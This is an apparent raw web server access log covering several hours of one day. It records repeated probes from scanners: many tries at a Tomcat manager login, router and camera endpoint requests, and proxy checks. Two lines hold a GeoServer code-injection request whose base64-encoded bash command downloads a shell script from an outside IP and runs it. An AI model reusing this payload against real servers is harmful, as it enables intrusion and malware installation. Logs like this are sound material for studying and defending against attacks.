114.80.33.21 - - [21/Jul/2026:00:02:36 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:06:03 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:09:43 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:00:11:13 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:00:13:16 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.243 - - [21/Jul/2026:00:16:02 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:00:16:58 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:00:19:04 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:00:20:29 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:24:09 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:27:42 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:31:22 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:34:55 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:38:37 +0200] "GET /manager/html HTTP/1.1" 401 2499
45.56.79.53 - - [21/Jul/2026:00:40:20 +0200] "GET / HTTP/1.1" 200 1895
66.228.53.78 - - [21/Jul/2026:00:40:45 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:00:42:07 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.243 - - [21/Jul/2026:00:42:29 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:00:45:51 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:49:20 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:53:01 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:00:56:33 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:00:13 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:03:46 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:07:25 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:10:59 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:14:39 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:18:12 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:21:55 +0200] "GET /manager/html HTTP/1.1" 401 2499
205.210.31.30 - - [21/Jul/2026:01:25:09 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:01:25:25 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:29:05 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:32:38 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:36:18 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:39:50 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:43:38 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:47:03 +0200] "GET /manager/html HTTP/1.1" 401 2499
66.132.224.232 - - [21/Jul/2026:01:49:23 +0200] "-" 400 1930
66.132.224.232 - - [21/Jul/2026:01:49:26 +0200] "GET / HTTP/1.1" 200 1895
66.132.224.232 - - [21/Jul/2026:01:49:34 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:01:50:42 +0200] "GET /manager/html HTTP/1.1" 401 2499
66.132.224.232 - - [21/Jul/2026:01:50:49 +0200] "-" 400 1930
66.132.224.232 - - [21/Jul/2026:01:50:51 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:01:54:16 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:01:57:56 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:01:29 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:05:09 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:08:42 +0200] "GET /manager/html HTTP/1.1" 401 2499
213.199.58.225 - - [21/Jul/2026:02:10:03 +0200] "GET /OA_HTML/FrmReportData HTTP/1.1" 404 743
114.80.33.21 - - [21/Jul/2026:02:12:24 +0200] "GET /manager/html HTTP/1.1" 401 2499
85.25.172.249 - - [21/Jul/2026:02:14:48 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
114.80.33.21 - - [21/Jul/2026:02:15:55 +0200] "GET /manager/html HTTP/1.1" 401 2499
192.248.150.180 - - [21/Jul/2026:02:19:02 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:02:19:38 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:23:08 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:26:49 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:30:21 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:34:01 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:37:34 +0200] "GET /manager/html HTTP/1.1" 401 2499
152.32.172.191 - - [21/Jul/2026:02:39:45 +0200] "-" 400 1930
152.32.172.191 - - [21/Jul/2026:02:39:47 +0200] "-" 400 1930
152.32.172.191 - - [21/Jul/2026:02:39:49 +0200] "-" 400 1930
152.32.172.191 - - [21/Jul/2026:02:39:58 +0200] "-" 400 1930
152.32.172.191 - - [21/Jul/2026:02:39:58 +0200] "-" 400 1930
152.32.172.191 - - [21/Jul/2026:02:39:58 +0200] "GET /v1/vector/collections/describe HTTP/1.1" 404 760
152.32.172.191 - - [21/Jul/2026:02:39:59 +0200] "GET /v1 HTTP/1.1" 404 720
152.32.172.191 - - [21/Jul/2026:02:39:59 +0200] "GET / HTTP/1.1" 200 1895
152.32.172.191 - - [21/Jul/2026:02:40:01 +0200] "GET / HTTP/1.1" 200 1895
152.32.172.191 - - [21/Jul/2026:02:40:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:02:41:14 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:44:46 +0200] "GET /manager/html HTTP/1.1" 401 2499
213.199.58.228 - - [21/Jul/2026:02:47:34 +0200] "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1" 404 804
114.80.33.21 - - [21/Jul/2026:02:48:26 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:51:59 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:02:52:05 +0200] "GET /login HTTP/1.1" 404 723
91.92.42.170 - - [21/Jul/2026:02:55:17 +0200] "CONNECT check-host.net:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:02:55:40 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:02:59:12 +0200] "GET /manager/html HTTP/1.1" 401 2499
177.22.44.30 - - [21/Jul/2026:03:01:00 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 731
114.80.33.21 - - [21/Jul/2026:03:02:53 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:06:25 +0200] "GET /manager/html HTTP/1.1" 401 2499
5.61.209.43 - - [21/Jul/2026:03:08:36 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:03:10:05 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:13:38 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:17:18 +0200] "GET /manager/html HTTP/1.1" 401 2499
31.76.120.186 - - [21/Jul/2026:03:17:32 +0200] "GET /login HTTP/1.1" 404 723
31.76.120.186 - - [21/Jul/2026:03:17:33 +0200] "GET / HTTP/1.1" 200 1895
31.76.120.186 - - [21/Jul/2026:03:17:34 +0200] "-" 400 1930
31.76.120.186 - - [21/Jul/2026:03:17:35 +0200] "-" 400 1930
31.76.120.186 - - [21/Jul/2026:03:17:36 +0200] "GET /api/admin/token HTTP/1.1" 404 741
31.76.120.186 - - [21/Jul/2026:03:17:37 +0200] "GET /dashboard/login HTTP/1.1" 404 737
31.76.120.186 - - [21/Jul/2026:03:17:39 +0200] "GET /dashboard HTTP/1.1" 404 727
31.76.120.186 - - [21/Jul/2026:03:17:40 +0200] "GET /login HTTP/1.1" 404 723
31.76.120.186 - - [21/Jul/2026:03:17:41 +0200] "-" 400 1930
31.76.120.186 - - [21/Jul/2026:03:17:42 +0200] "-" 400 1930
31.76.120.186 - - [21/Jul/2026:03:17:43 +0200] "-" 400 1930
31.76.120.186 - - [21/Jul/2026:03:17:44 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:03:20:51 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:24:31 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:28:04 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:31:44 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:35:17 +0200] "GET /manager/html HTTP/1.1" 401 2499
147.185.132.201 - - [21/Jul/2026:03:37:26 +0200] "GET / HTTP/1.0" 200 1895
94.154.43.243 - - [21/Jul/2026:03:38:21 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:03:38:57 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:42:30 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:46:10 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:49:43 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:53:22 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:03:56:56 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:00:36 +0200] "GET /manager/html HTTP/1.1" 401 2499
45.198.224.5 - - [21/Jul/2026:04:01:28 +0200] "GET /login HTTP/1.1" 404 723
18.116.101.220 - - [21/Jul/2026:04:03:39 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:04:04:09 +0200] "GET /manager/html HTTP/1.1" 401 2499
18.116.101.220 - - [21/Jul/2026:04:05:38 +0200] "GET / HTTP/1.1" 200 1895
18.116.101.220 - - [21/Jul/2026:04:07:51 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:04:07:53 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.114 - - [21/Jul/2026:04:09:03 +0200] "GET /login HTTP/1.1" 404 723
18.116.101.220 - - [21/Jul/2026:04:10:05 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:04:11:22 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:15:01 +0200] "GET /manager/html HTTP/1.1" 401 2499
195.178.110.137 - - [21/Jul/2026:04:15:04 +0200] "-" 400 1930
195.178.110.137 - - [21/Jul/2026:04:15:04 +0200] "-" 400 1930
195.178.110.137 - - [21/Jul/2026:04:15:04 +0200] "CONNECT 104.16.184.241:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:04:18:35 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:22:17 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:25:47 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:29:35 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:33:00 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:36:39 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:04:37:24 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:04:40:13 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:43:53 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:47:26 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:51:07 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:54:39 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:04:58:18 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:01:52 +0200] "GET /manager/html HTTP/1.1" 401 2499
141.98.11.11 - - [21/Jul/2026:05:04:55 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:05:05:34 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:09:05 +0200] "GET /manager/html HTTP/1.1" 401 2499
5.61.209.92 - - [21/Jul/2026:05:12:28 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:05:12:47 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:16:19 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:19:58 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:23:31 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:27:13 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:30:44 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:34:28 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:37:57 +0200] "GET /manager/html HTTP/1.1" 401 2499
198.235.24.129 - - [21/Jul/2026:05:40:09 +0200] "-" 400 1930
198.235.24.129 - - [21/Jul/2026:05:40:09 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:05:41:43 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:45:09 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:05:45:47 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:05:48:49 +0200] "GET /manager/html HTTP/1.1" 401 2499
3.85.30.112 - - [21/Jul/2026:05:52:11 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:05:52:22 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:56:04 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:05:59:35 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:03:17 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:06:48 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:10:32 +0200] "GET /manager/html HTTP/1.1" 401 2499
168.126.138.237 - - [21/Jul/2026:06:12:45 +0200] "GET / HTTP/1.0" 200 1895
114.80.33.21 - - [21/Jul/2026:06:14:02 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:17:42 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:21:14 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:24:53 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:28:27 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:32:06 +0200] "GET /manager/html HTTP/1.1" 401 2499
65.49.1.172 - - [21/Jul/2026:06:33:06 +0200] "GET / HTTP/1.1" 200 1895
65.49.1.173 - - [21/Jul/2026:06:34:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:06:35:39 +0200] "GET /manager/html HTTP/1.1" 401 2499
65.49.1.178 - - [21/Jul/2026:06:36:44 +0200] "GET /?format=json HTTP/1.1" 200 1895
213.166.84.39 - - [21/Jul/2026:06:36:49 +0200] "GET /zc?action=getInfo HTTP/1.1" 404 720
188.240.59.30 - - [21/Jul/2026:06:36:53 +0200] "GET / HTTP/1.1" 200 1895
193.32.209.236 - - [21/Jul/2026:06:36:53 +0200] "GET /favicon.ico HTTP/1.1" 404 729
185.216.145.168 - - [21/Jul/2026:06:36:53 +0200] "POST / HTTP/1.1" 200 1895
193.176.29.4 - - [21/Jul/2026:06:36:53 +0200] "POST /mcp HTTP/1.1" 404 721
5.226.140.28 - - [21/Jul/2026:06:36:53 +0200] "GET /sse HTTP/1.1" 404 721
65.49.1.178 - - [21/Jul/2026:06:37:10 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
65.49.1.172 - - [21/Jul/2026:06:37:41 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740
195.182.16.23 - - [21/Jul/2026:06:39:09 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:06:39:20 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:42:52 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:46:35 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.64 - - [21/Jul/2026:06:48:22 +0200] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1" 404 735
114.80.33.21 - - [21/Jul/2026:06:50:05 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:53:46 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:06:57:18 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:00:57 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:04:31 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:08:11 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:11:44 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:15:24 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:18:57 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:22:37 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:07:24:18 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
45.77.61.56 - - [21/Jul/2026:07:24:23 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:07:26:10 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:29:53 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:33:23 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:37:04 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:40:36 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:44:16 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:47:48 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:51:31 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:55:01 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:07:58:42 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:02:14 +0200] "GET /manager/html HTTP/1.1" 401 2499
5.61.209.43 - - [21/Jul/2026:08:03:29 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:08:05:54 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:09:27 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:13:11 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:16:40 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:20:20 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:23:53 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:27:37 +0200] "GET /manager/html HTTP/1.1" 401 2499
45.198.224.5 - - [21/Jul/2026:08:28:06 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:08:31:06 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:34:46 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:38:19 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:42:04 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:45:33 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:49:13 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:08:52:45 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.243 - - [21/Jul/2026:08:55:50 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:08:56:26 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:08:57:18 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:08:59:58 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:09:00:55 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:09:03:41 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:09:07:11 +0200] "GET /manager/html HTTP/1.1" 401 2499
168.144.135.104 - - [21/Jul/2026:09:08:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:09:10:54 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:09:14:24 +0200] "GET /manager/html HTTP/1.1" 401 2499
176.65.148.81 - - [21/Jul/2026:09:15:00 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804
143.110.158.123 - - [21/Jul/2026:09:15:48 +0200] "GET / HTTP/1.1" 200 1895
143.110.158.123 - - [21/Jul/2026:09:15:48 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:09:18:07 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:09:20:36 +0200] "GET /login HTTP/1.1" 404 723
195.182.16.23 - - [21/Jul/2026:09:20:45 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:09:21:37 +0200] "GET /manager/html HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:09:25:17 +0200] "GET /manager/html HTTP/1.1" 401 2499
44.220.185.153 - - [21/Jul/2026:09:28:26 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:09:28:50 +0200] "GET /manager/html HTTP/1.1" 401 2499
94.154.43.114 - - [21/Jul/2026:09:36:39 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:10:02:35 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:06:03 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:09:42 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:13:17 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:16:56 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
5.61.209.43 - - [21/Jul/2026:10:18:31 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
94.154.43.54 - - [21/Jul/2026:10:19:00 +0200] "GET /login HTTP/1.1" 404 723
39.152.138.34 - - [21/Jul/2026:10:19:07 +0200] "GET / HTTP/1.1" 200 1895
39.152.138.34 - - [21/Jul/2026:10:19:13 +0200] "GET / HTTP/1.1" 200 1895
141.98.11.11 - - [21/Jul/2026:10:19:13 +0200] "GET / HTTP/1.1" 200 1895
39.152.138.34 - - [21/Jul/2026:10:19:14 +0200] "GET / HTTP/1.1" 200 1895
94.154.43.64 - - [21/Jul/2026:10:19:38 +0200] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1" 404 735
114.80.33.21 - - [21/Jul/2026:10:20:30 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:24:16 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:27:42 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:31:21 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:34:54 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:10:37:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:10:38:34 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
5.61.209.92 - - [21/Jul/2026:10:39:31 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:10:42:07 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:45:47 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:49:20 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
152.42.202.205 - - [21/Jul/2026:10:53:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:10:53:02 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:10:56:33 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:00:13 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
